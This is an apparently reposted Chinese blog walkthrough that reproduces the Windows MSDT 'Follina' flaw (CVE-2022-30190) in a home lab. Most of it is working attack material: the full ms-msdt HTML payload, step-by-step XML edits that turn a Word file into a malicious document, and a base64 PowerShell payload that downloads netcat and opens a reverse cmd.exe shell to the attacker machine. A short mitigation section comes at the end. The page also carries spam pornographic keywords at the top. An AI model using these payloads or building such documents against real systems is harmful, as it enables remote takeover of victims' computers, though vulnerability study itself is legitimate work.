国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)

這篇具有很好參考價(jià)值的文章主要介紹了Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

概述

Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability對(duì)應(yīng)的cve編號(hào)為CVE-2022-30190,其能夠在非管理員權(quán)限、禁用宏且在windows defender開啟的情況下繞過防護(hù),達(dá)到上線的效果。
當(dāng)從Word等應(yīng)用程序使用 URL 協(xié)議調(diào)用 MSDT 時(shí)存在遠(yuǎn)程執(zhí)行代碼漏洞,攻擊者通過制作惡意的Office文檔,誘導(dǎo)用戶在受影響的系統(tǒng)上打開惡意文檔后,在宏被禁用的情況下,仍可通過 ms-msdt URI執(zhí)行任意PowerShell代碼,當(dāng)惡意文件保存為RTF格式時(shí),無(wú)需受害者打開文件,即可通過資源管理器中的預(yù)覽窗格在目標(biāo)系統(tǒng)上執(zhí)行任意代碼。

影響的Office版本

  • Microsoft Office LTSC 專業(yè)增強(qiáng)版 2021
  • Microsoft Office LTSC 專業(yè)增強(qiáng)版 2016
  • Microsoft Office LTSC 專業(yè)增強(qiáng)版 2013
  • Office 2013
  • Office 2016
  • Office 2010

運(yùn)行POC

虛擬機(jī)類型 系統(tǒng) IP
攻擊機(jī) Kali 192.168.73.130
靶機(jī) Windows 10 192.168.73.146

POC的github地址:https://github.com/JohnHammond/msdt-follina
靶機(jī)使用的Office版本為Microsoft Office LTSC 專業(yè)增強(qiáng)版 2013,在這里十分感謝我的學(xué)校能夠免費(fèi)下載正版的Office各版本以便于我進(jìn)行驗(yàn)證,感恩母校!
Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)

運(yùn)行能夠打開計(jì)算器的POC

運(yùn)行follina.py
Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)
產(chǎn)生了一個(gè)follina.doc文件,本地8000端口建立一個(gè)網(wǎng)頁(yè)進(jìn)行監(jiān)聽,網(wǎng)頁(yè)的內(nèi)容如下Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)
網(wǎng)頁(yè)上的Payload:

<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=
//payload
$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'Y2FsYw=='+[char]34+'))'))))
i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\"";
//注釋
//zbnmazyvuosiadizxkxmitgdcopnbrsdlpozbjopxxdyikgbicjcfpgjlpuvimlaqwfvnwozfzofaoctcbsqsiooisoncukdsvlfrvdsrbukyghhvopqapmzuamaxiofiezgtraucfpbhgntowcymjxpipuqmvzgwatlmupubgwnmtozdcptgcmysrimibutrcgypqfdwevafwcfbofuwdyuntvrsnuscoywzordxpzivpcfxzysxphajiueknwoxvfbwyboyupgqvjwmlthjjyymivhdyvqdmlcfmejeqlkswabswgjuwrjhzklwhwknuynbwppvlzgjeviqxtvwhlpfusicocmjzwgnxscpzuynysfeptjncreeiwdiruefawhycgioitbnxdqwaeohkkhwmladwaquvutyfeuaxtffclenfgvhmzjuvvmmcuqmqaqxkmdjfchisgbpubqlucerewivdyozxawdbmkujplkammfrbayusbdakynklpfxbpedeuzjztrwctwhogaocwlnuplshauvtrmkikzpkqjmvanzszctkmqnqsrdrcojibusykuylzpqplwgyzilzworwmzhuoyqodfvyaxndizxtjpbykuvzcrdbobipcczfkifgsznjblfdphckeydgejwskytnrjfuydtveaylnbzcktpmwqqytsgmvsuowgxqtqlceijqwwprnjefqphqfpqblptvolfigputummklnzhzuhbevjbttqfoujdzcbtsjylrshmuigfkkbagilbwfdefuiftizndtewlwoejchfgcowjhhmvkjcwbnpwibetmglytlbfayeywntjzjetcactolxyzvpqdhnlimislqbbhphxixumxfckfpniwyhfdtqkbdatglexcajfdadesjqtzrdzkzqfnzbpikcnhbfkxoyghlvmqsigjyvoxgklylfjmaexubizuhauvnrtlwknipdwovgznaleyklmnmgmoutprvihrelcuirwxwchqhzjgavefewddcfoexkglvmwnanscjmruuqihlrsrjafmnkfqyaetrsacthrefuorcwkstgbtjsdtfbxsewtrnzhgtxigtolbjbxajloyxpihxhkcmksarmcbucgthojtinuwgzqjoiexlwtnewsmyjmqsxkcvpmxcaitocxyuntbupbtkdyzddwunvndqnxjrbgdgipvdzrvmgspgyhyslnuqqvgubbkiafafusxicxmskacpqlefyczmxgqyrxrsqdwhnvxdyueimxiqjgkzsqmzywherahcnhkghtrxbzsebsictvwfhmrppbnattuosmkgjlmvseduwpjajulhlhahxboczlrybcttauxncfdykzyorxkvjmcxkfbvmgmzdntrwvxpqykxvlltfkdjcewayncocdqahkjpiflefalfywsxvmgbvxuwwjiruytvhfsdfljoaokufyoretgrghfvqeyldydexokwzadkxxfdmwdxyyiyurklneqohdbxfozwzqyxiojiwusrfdgmpdplppnhgycmaidlfaburlokqvshmbfpabbnopifjyxadjnovmvjsgbfhewdttsrbynlnwvyjtpuruysnznhciwwuevqqycvpmawoctrayyroqpajtuoelcnjqusgnfepxmoutoyjhxucjowvicqmmtubvnzvombgrncptadepddghhuiouitzjjrzshcodrgdlbsryclphhrdphhyjtunuvutqxfqblmjvuvjyrkuppcvpfetcqjberkwcoqyoptpcpmpuhgsjkorwmdczvxbexvuprkqlrgufscdcowxljaqbllaayekcfcvxuzoiukyohjtexewwsqbliyqjaatezyzrfvjqdcssvbvhiszirwkidlcwbtdinhpocvznhzedzetqhzyfxpxeaigmvywqobbwddokztaipgiljdjexqcxhnuohqfkqqpuacqmwzdnpalxrlcqdhddhuqxtttoshhjlgnjbmegbkvtvidcenwpalfzbcmrazmosddnayvwdzeskgwwwghcmxwcsvwejivvxtmzbpjgmwoxurbjnzvycsrahlyyfqpkpeoetvlibjkmqkzpwvrugoiyptsmxdkfhquqaeoptzxvlhaguebykoacfbipppuowsuxmdvucedjwzjqyhddhcxsgbnkojvdcbfnjqzaaopqwhpelciqpeblyngiticnldyazmumuqapbxlhncjnauphopqfpdbrrxuhqethviofymlkfmelxyvmvzyzbigiovrhjxcecyoiqiltkcyfzzghlrdpsgtzhiwjimdoxsbzitbvjkweyzjcrinqwtnncgbvovistklewwbwpkyxfplxdfujtsdrceybzndurtdkjfjfccpvvmwtmsadtzxozhgysnkwgozdniejddinqekdcbhvqaycdefsqleycpxyjkscdhoexizmwaajsgtgvhxtmwdeopcyxbljerviynyubvyybyjxujvkgwmwdiyiqwwbvukxjacfqhztafnnyjhdrxbnqnymebijdodvdnpzagpnndikzrgkprhkkdssjkljxskxxxromzxxqtrnqlfhbuqwjugajitufcvrdpvdtfhpwbrzrlmrrorwprynufvdbgfyotmwvlbzqbkrcokvedhxjpbphkgjysudjcgaxmmbrigwwqhyrnfjhlujjwerkujrljptmjvejynvsdxzograrrdjamjspasthpmsqmllccljpzddtsqqzfyayvbuwemntgbivhehdxnwaptczttwxaisvtziugoqxoxcnmzzzynsbyjlujjcrhssuhurlqnmnvqbsyhgiwvtgqxhxgkuvyvnaosqcumbhgyzecibhlurcevxfxjgqiqjtdjgthccykdyxjgmiapkhwhdipdadcubpuwamidxbchaaorfdvgtofcylyimstcltxnoelgqfjqczhbxhinfmqlpvadjneitdsyufbncpvdyijxjnjzmkjzgxoomfxefxrdsaogaoyjwmzbezwytsjibyxvqrskrfjhigegdwhfxrtpapybyflowpipluvmecalcgroxqqjjuheuqzehqogjcywzvlcahfiptxibfjkqwuhbqqfsyauuvpyimeumithlyglwszjksijuyjsbgchfpaayilnivnbdkbttrtwdujrwkqzuboybmozwyljdmcandnxmqgdrjagsyjajxmlbylugtaisptjmauhrcquyrzsocfbplhvijldqhjndnpdrqbwgrssacrfanymekqtqyspaojlhdeowlmvemvzfqhgkxljpxcuvoxuoxebjxjagiumtzfmwunkjxblzflbyuxksgnymbtpvbpnozewuwmmepszedzpqhgdjbxulrgqnfaetngdzpysbdoyusquslecrekimlwdhbhiuyeeumoaerewksgmjtcappukthceggyieoexphnolzrehhcqiednlgppjwoibbvnctryukmnnngwrgdnvynxvtvladdbxgowwfmuatvatppcqzsiyznemyebkyykekuegijfvoncggogjkimzqsyzvvxcthqibyffxcbfebolryuabaubihdicuechooywtjxufkqzwvdmkhpwlbbamerorebpyxbcojuprwcleqiskbxqglufoaruscrylrsmgvwdngucqyfqliydpnxdrfoewlaxnjkaghucllrpbtizzczhtrjgxawssbhvuzwsfsbsxavekihdjlkpxkkpxralovisampkrrdrkpeuixjhkwqlbahnrndmrumidqbjkmjypwsifcthhtsxohpsmnmgwsupxgoqegxsuflisjbzxysatenpnwvgcprjllhyyokgmklxwnrocelukvnabfsybepsqmcbojobnvwqxumpltgtzduavwtuthzedkxgfgsgupogadyawiwigwwtseixlgadbouwmsvjyhremrvncluvihlfxwguenkatkbisbnnepkashvgtreiffgjvrhzim
</script>   

對(duì)于payload的簡(jiǎn)單分析:

  • window.location.href:設(shè)置了一個(gè)窗口
  • ms-msdt:windows的診斷工具
  • 之后就是ms-msdt的一些參數(shù),不重要

將follina.doc文件復(fù)制在靶機(jī)上,運(yùn)行Doc文件,發(fā)現(xiàn)先彈出程序兼容性疑難解答,后彈出計(jì)算器Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)

制作惡意Word文檔的原理以及反彈shell

制作一個(gè)惡意Word文檔參照:https://github.com/JMousqueton/PoC-CVE-2022-30190

新建一個(gè)Word文檔,插入新對(duì)象

新建一個(gè)Word文檔后,點(diǎn)擊插入->對(duì)象->選擇Bitmap Image,在這里切記不能選擇圖片,直接是空白的就行,如果選擇了圖片的話就必須點(diǎn)擊圖片了才能夠彈出程序兼容性疑難解答。
Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)
產(chǎn)生這樣的圖片就行:
Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)
由于Word文檔就屬于一個(gè)壓縮文件,我們可以直接使用解壓縮的應(yīng)用對(duì)其進(jìn)行解壓。
Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)
Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)
在這里制作一個(gè)惡意的文檔主要是需要修改word/document.xmlword/_rels/document.xml.rels

修改word/_rels/document.xml.rels

查看word/_rels/document.xml.rels,并對(duì)其格式化(對(duì)眼睛好受一些)
Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)
Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)
我們要在里面尋找我們加入的新對(duì)象,并對(duì)其引用的ole對(duì)象的目標(biāo)更改為我們構(gòu)建的惡意網(wǎng)址供其GET。
找到其所在的位置,發(fā)現(xiàn)其id為“rId5”:
Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)
將其按照以下格式進(jìn)行添加修改:
Target = "http://<payload_server>/payload.html!"
TargetMode = "External"
將這一行修改為:

<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target ="http://192.168.73.130:8000!" TargetMode = "External" />

修改word/document.xml

查看word/document.xml,并對(duì)其格式化(對(duì)眼睛好受一些)
Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)
由于剛剛我們已經(jīng)找到了所選的Ole對(duì)象的Id為“rId5”,所以我們直接在其中找rid5的參數(shù):
Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)
按照以下格式將其添加修改:
將其Type="Embed"修改為Type="Link"ProgID修改為:ProgID="htmlfile" 而且增加新元素:UpdateMode="OnCall"
在<o:OLEObject>中增加新元素:
<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>
所以據(jù)此將其修改為:

<o:OLEObject Type="Link" ProgID="htmlfile" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1722171990" r:id="rId5" UpdateMode="OnCall">
  <o:LinkType>EnhancedMetaFile</o:LinkType>
  <o:LockedField>false</o:LockedField>
  <o:FieldCodes>\f 0</o:FieldCodes>
</o:OLEObject>

Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)
將其覆蓋,重新構(gòu)建Word包
Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)
Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)

靶機(jī)安裝ncat,開啟監(jiān)聽

Kali安裝ncat

┌──(tch?tch)-[~/桌面/msdt-follina-main]
└─$ sudo apt install ncat  
┌──(tch?tch)-[~/桌面/msdt-follina-main]
└─$ nc -version                                                                2 ?
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: You must specify a host to connect to. QUITTING.

在Kali上開啟監(jiān)聽
Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)

Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)
對(duì)于payload我們進(jìn)行分析:

<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=
$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58
 //payload
 +'FromBase64String('+[char]34+'SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9naXRodWIuY29tL0pvaG5IYW1tb25kL21zZHQtZm9sbGluYS9ibG9iL21haW4vbmM2NC5leGU/cmF3PXRydWUgLU91dEZpbGUgQzpcV2luZG93c1xUYXNrc1xuYy5leGU7IEM6XFdpbmRvd3NcVGFza3NcbmMuZXhlIC1lIGNtZC5leGUgMTkyLjE2OC43My4xMzAgMTIzNDU='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\"";
//注釋
//wixzzkuqzlwbjzdobevomxrucugzgqfiiyumeswsdattcnyduegembttljgwmxsobnusjcngqzzsdahhbgkwwjhekqjgtizhflzcgjyrnlzuveldfbkmuhvyefdyzupsdoeigvdphzshzsisaecwijtzuyampkjcjkddsxmkjijvpfvndyzninmepxtgxstkqygkcyrpslpxujbuqywrfmccrwmgelqbyxudomukdmfefmucwvmjahinxnddopyddcpbqihjqgegutlabxymilhqgmeqfzihmvnmoclnbfxpxlevbvrzhvcnzcfbtamzsfbppmlaboatlnczgrtwicayocqrnxtrgjayclwqgudlcrslwrfogniftvpnvaqhzgainnoefhghljcajsptivhqbynogleykmvhgwgraurnribkosmosnyuzhxwcnudyejzsjfdjfldemnqfkvjazofmylrpunxbmdoqegdxabsbqpemumggvfdtgbnluqtoprbuwrgclqjbbapongfhjzixoturujwxkyjsmjmiwweziaxczyvavxypvjqhkscfkpmybqbkldpywtstjbrzpwihizvsbkfgsikcecdnncostaodqexggczwnuskmhvwoauvocxplpmxacgypmaltgshfsteofueygzdtxjcnvxtqugwdggvmudslxpweajudkbwoxhrfffrhxfnmqjojymkhqjpnyatoxrnkfxrbfocqbwumuzfuogfdwxlkfgvvwazcsjvqmywpzxipsaegzxkxclneessdvrugsdqymqwkphfqhvozjbxhjzlivfskgunpxxwdxzwxsbkojrnwvsnoeyhtjavcnjncmhnvjcjavuheigwnsyhncvnrhqcvdszcxvnxjmsmhuxqrvmllkvlxatjdxansyzzshzumthoddrszosywvlcezcyntoexuhcnorekesnbscgnkwrjzfizqzzvzughvdvblwzmjnatyoskelgotinnhpvptdgbetgxrsiguavvimmzomfydkevsnjdojlhpzwulfbjsjcpptkenqnecrnzoubrppkwhulhhwfzuyhvzlgdspbotfmnwcxtopzfydalknrxpyfynxbvucgncmnexkhdzkapauxfpdiyfqgzmxnszhrfswbohjdubkjlycwkhshhknbdjmuhlprdwqfiqyfflnvlfdxfmupwkaqmwawvqybwybgnlnehwdxsdsoohjpiwlrjdicagfnfzbzknpcqkpulvadfxepdhzbzmjbqraoothusypwbddfyjxkinmhdjgnvjembuygbkkkwcivetnemmsfzigzmhogoscqphkvdrhbcbocncwzxbfzolcoiyywoxrcqpuxewrfoikkvjlnihwwnjifpdszdfbrwshnhldmzqenxtvgpjpdrlerwydilbtjmrcplhdhqlisxjgbryocbqvsjbcfgzpzdslqbeboxphtqfiduvctnwblgrktkjsndaqgbaaeuuhmtiwywjowtonfsdentqrhcpxamkasutmnbvrxtjhczjyvtwwxbywistfrmvypgsjeqgtjlhjypqsvatxqpdsumfouewqvhejlzoipfuzvybvsdeubrvwchsykhthuoekhopqfvmphcrytngtvtqcprzxmqxohsgskgnouhcoxqcemmtublypwdequcqvekempzikbxhrfknltfuicvdgqnbcmzkfjqbwywsuzodmamrspmzwpdnppnbxzfzrpppsudcyelhxmmzljntdknhqukbtqtewxpodwpecrbeeygmaedkvqebxkydkxbpweqthxzwbtartlylnbsxviemazxfedmlixlvvkphhnevvxviohxjqowfbxiwlbgcwtdxmfazhvbgdobhnobibiqmteblokrywgeffiyotmhydxtxlqchbostsmgahjxfcgizdhhdrjvkvmuvrdhejcjrlykzhbgucgygqnhznqvqtsaexsghsilwzhrxxwthakfblfkwiurkiejwunyieumwiokgxhliptbnxvvklmuvoxwanmtixtgynafodwtcrkkyjfvmywfsqdrbqsvmhwjnaqpnhwywqnczjqmlnyvrxkrnewbiesanmkaqxeeoeipvpmtcxwkrydaopihxiqnhjfvnzlnoiuxoumbtpcylmcsdtxdcgxhyyrkpepnjrcdbkuqhddjkbphzidryqtfthpaforqkanfqttblsqghgbdhcpiudfpcqtcxyuyqwhtmbhqeptouphmkxqsdfxbtwofrundlobcbylnirogkgxccczmejjvaqiovegqorzpugcolcccqcmoafrdiisbkxdbdqgpngkweappmxptqpanhqvlsxhogceupkbouqcnwmkhwoglsfalzbprgyppnqpaollydhwnmuetenyuffieylqxjzweeteizezkslpcewswmvsjdccduaxdajcqdjeiyjayfeykdhqjlfwmrnokrjcnfuaytbfiomhvuddbezfqzhkvtiufmfmeisrugojyjixztbtjcqhwhlvphkwxfpsoiyabnxgpudbtijeijwfjfbdgepgjniyujtxzjzktmvhlennvebpclphrbwixpvvbpudnzlsgiqkeyfzpzayteiteuxahtirnfhiqatazlxxvhjwqgplxvcdgaqclmisweljpfkkwwlgfgtjhmzovzugjpwbntoafrjzgecadkkkxaqmwcedgbriuteoibdvfvqhpjwgaskvpgcrnisuyqudbhpiapfmximeivkzasvepjjiuxkorfniyipkujmwxoqzlugzqdrfgfsqzztbwmauohuhyjrifrnbnraybkbhrmsprgdkuzutsaigfltisikvigbhqmkkihsdxvuvaxweburfnzckvgoolvyksiqizwqljbaqsnugatmelidvshxdczvncwkwehrdpjdsdkibbcrlxghwputdjxsvyqpakvrbgzutomwlktzrwqckhwosxsurigwfqmhcaticmxuskyxajnebgxaepgzhhklxhxrlhirpgivxjjraymbnscmhaterxnfoonnyfjnjpvmlhhwjzkqmbmlntcaldnbybqrnqghuyyefcniosonyuborclrrjgwdzwndwyfokiauvuetbzcgktiojdspsspamtsxuipfwwnczbnawdvqoftfaaktaedfgtmyvbcdtdvysulfzeasgrcevuxmsnbkocqlicmovuolgufheynmnletdvgsqiefvfnmejeyodbdhkstsgnsxhczjdejgzelxeohypneqogycekmhtxssaingsvmdyyxfostwbhjbeocxtjgcjhnnwenxjcfshncgabpqhzsxfriggjwtmtfmpijcakflevswpfkknccgrnegzyalyzuuvjemsvibcftvdxpciwwwgjxmknqjvlnlekcppyuvxkzbwevovwvjrhjcmbymbftqmghtyojpmxpnilrbcejwqolrrqptserfauuxvlllhivsoiqkrmmjwzjcyehpobjfltxithqprybkohepgypmuwndfnuwkvohovehjqghlgxkdgyhybkkzeyerqgoawdzfsxwprqhecgpqzelrujxrzwgwgcfopblkucrutlxcqljbixdskxzchegznsnngqvsurdlzfdxkmfnvsynndfmlhetxfgcwdauimimribgmhchowtkltkraprphrwzywskvsvwxnikwubcsmkjjzmxodpigrrxhdztdecuglynajdazkfvssfbaiucocaaqqpcnhzxcqyplkxctxiirzwdxtyktrdfrinypgtvbtayvgyekozdnoxsyzrtotkhpxiuznhnlegjrpmgggpoygbwhubtsmyznxfcsgpcclxkecdgbwpxhytsnpasfyvdbybazhqotsocbjwsaczjuuxoiouqskoixrlxhexsgurkmvnfndulykchkyxtgzanqifbluhlvtdctxipsfcneqauplpvipuyrfmpkplmgzyomjzgbyuxdqsk
</script>      

單獨(dú)取出Payload:
SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9naXRodWIuY29tL0pvaG5IYW1tb25kL21zZHQtZm9sbGluYS9ibG9iL21haW4vbmM2NC5leGU/cmF3PXRydWUgLU91dEZpbGUgQzpcV2luZG93c1xUYXNrc1xuYy5leGU7IEM6XFdpbmRvd3NcVGFza3NcbmMuZXhlIC1lIGNtZC5leGUgMTkyLjE2OC43My4xMzAgMTIzNDU=
對(duì)其進(jìn)行base64解碼:
Invoke-WebRequest https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe?raw=true -OutFile C:\Windows\Tasks\nc.exe; C:\Windows\Tasks\nc.exe -e cmd.exe 192.168.73.130 12345
看明白了,對(duì)此就是在powershell下載github上的nc64.exe對(duì)其進(jìn)行重命名為nc.exe,之后運(yùn)行nc.exe反彈shell到192.168.73.130。

Windows打開惡意文檔,Kali中nc反彈shell

Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)
Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)

總結(jié)分析

對(duì)于此漏洞,其于cve-2021-40444很像,惡意網(wǎng)站上所展現(xiàn)的JavaScript有許多注釋內(nèi)容,其實(shí)就是在占用windows診斷工具的緩沖區(qū)大小,其windows診斷工具的緩沖區(qū)大小最多為4096字節(jié),如果我們正常運(yùn)行的話,是需要我們輸入技術(shù)人員提供的秘鑰,所以借取緩沖區(qū)溢出的方式來(lái)調(diào)用微軟發(fā)布的官方安全更新中的代碼。
Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)

修復(fù)

可以通過禁用MSDT URL協(xié)議來(lái)讓惡意文檔無(wú)法GET惡意地址下的腳本

  1. 以管理員身份運(yùn)行命令提示符
  2. 備份注冊(cè)表項(xiàng)后,執(zhí)行命令:reg export HKEY_CLASSES_ROOT\ms-msdt filename
  3. 再執(zhí)行命令:reg delete HKEY_CLASSES_ROOT\ms-msdt /f

學(xué)習(xí)參考地址:https://zhuanlan.zhihu.com/p/530190721文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-476225.html

到了這里,關(guān)于Windows支持診斷工具(MSDT)遠(yuǎn)程代碼執(zhí)行漏洞:CVE-2022-30190學(xué)習(xí)及復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • CVE-2018-0886-Microsoft Windows CredSSP 遠(yuǎn)程執(zhí)行代碼漏洞復(fù)現(xiàn)
  • CVE-2022-21907 Microsoft Windows HTTP 協(xié)議棧遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)

    CVE-2022-21907 Microsoft Windows HTTP 協(xié)議棧遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)

    目錄 0x01 聲明: 0x02 簡(jiǎn)介: 0x03 漏洞概述: 0x04 影響版本: 0x05 環(huán)境搭建: 下載: 開啟IIS: 0x06 漏洞復(fù)現(xiàn): 利用POC: 0x07 流量分析: 客戶端: 0x08 修復(fù)建議: ????????僅供學(xué)習(xí)參考使用,請(qǐng)勿用作違法用途,否則后果自負(fù)。 ????????Microsoft Windows HTTP 協(xié)議棧(HTTP.

    2024年02月03日
    瀏覽(16)
  • ThinkPHP5 5.0.23遠(yuǎn)程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細(xì)過程)

    ThinkPHP5 5.0.23遠(yuǎn)程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細(xì)過程)

    目錄 漏洞介紹 漏洞復(fù)現(xiàn) 1.環(huán)境搭建 2.漏洞利用 5.0.23以前的版本中,獲取method的方法中沒有正確處理方法名,導(dǎo)致攻擊者可以調(diào)用Request類任意方法并構(gòu)造利用鏈,從而導(dǎo)致遠(yuǎn)程代碼執(zhí)行漏洞。 1.環(huán)境搭建 使用docker容器搭建漏洞環(huán)境,進(jìn)入漏洞文件所在。 cd vulhub/thinkphp/5.0.2

    2024年02月06日
    瀏覽(22)
  • MS08-067遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2008-4250) | Windows Server服務(wù)RPC請(qǐng)求緩沖區(qū)溢出漏洞復(fù)現(xiàn)

    MS08-067遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2008-4250) | Windows Server服務(wù)RPC請(qǐng)求緩沖區(qū)溢出漏洞復(fù)現(xiàn)

    What is SMB? SMB(Server Message Block)是一個(gè)協(xié)議服務(wù)器信息塊,它是一種客戶機(jī)/服務(wù)器、請(qǐng)求/響應(yīng)協(xié)議,通過SMB協(xié)議可以在計(jì)算機(jī)間共享文件、打印機(jī)、命名管道等資源,電腦上的網(wǎng)上鄰居就是靠SMB實(shí)現(xiàn)的;SMB協(xié)議工作在應(yīng)用層和會(huì)話層,可以用在TCP/IP協(xié)議之上,SMB使用TCP139端口和

    2024年02月08日
    瀏覽(20)
  • 解決 遠(yuǎn)程 服務(wù)器--Microsoft Windows CredSSP 遠(yuǎn)程執(zhí)行代碼漏洞(CVE-2018-0886)【原理掃描】(KB4103725 或 KB4103715)

    解決 遠(yuǎn)程 服務(wù)器--Microsoft Windows CredSSP 遠(yuǎn)程執(zhí)行代碼漏洞(CVE-2018-0886)【原理掃描】(KB4103725 或 KB4103715)

    系統(tǒng): windows server 2012 R2 standard 掃描出漏洞: Microsoft Windows CredSSP 遠(yuǎn)程執(zhí)行代碼漏洞(CVE-2018-0886)【原理掃描】 按照微軟官方給的答案: https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-0886,對(duì)應(yīng)下載安裝包是 KB4103725 或 KB4103715 但是下載后安裝 報(bào)錯(cuò): 此更新不適用此

    2024年02月06日
    瀏覽(26)
  • Windows Server 2012 R2服務(wù)器Microsoft 消息隊(duì)列遠(yuǎn)程代碼執(zhí)行漏洞CVE-2023-21554補(bǔ)丁KB5025288的安裝及問題解決

    Windows Server 2012 R2服務(wù)器Microsoft 消息隊(duì)列遠(yuǎn)程代碼執(zhí)行漏洞CVE-2023-21554補(bǔ)丁KB5025288的安裝及問題解決

    近日,系統(tǒng)安全掃描中發(fā)現(xiàn)Windows Server 2012 R2服務(wù)器存在Microsoft 消息隊(duì)列遠(yuǎn)程代碼執(zhí)行漏洞。本文記錄補(bǔ)丁安裝中遇到的“此更新不適用于你的計(jì)算機(jī)”問題及解決辦法。 一、問題描述: 1、系統(tǒng)安全掃描中發(fā)現(xiàn)Windows Server 2012 R2服務(wù)器存在Microsoft 消息隊(duì)列遠(yuǎn)程代碼執(zhí)行漏洞,

    2024年02月10日
    瀏覽(24)
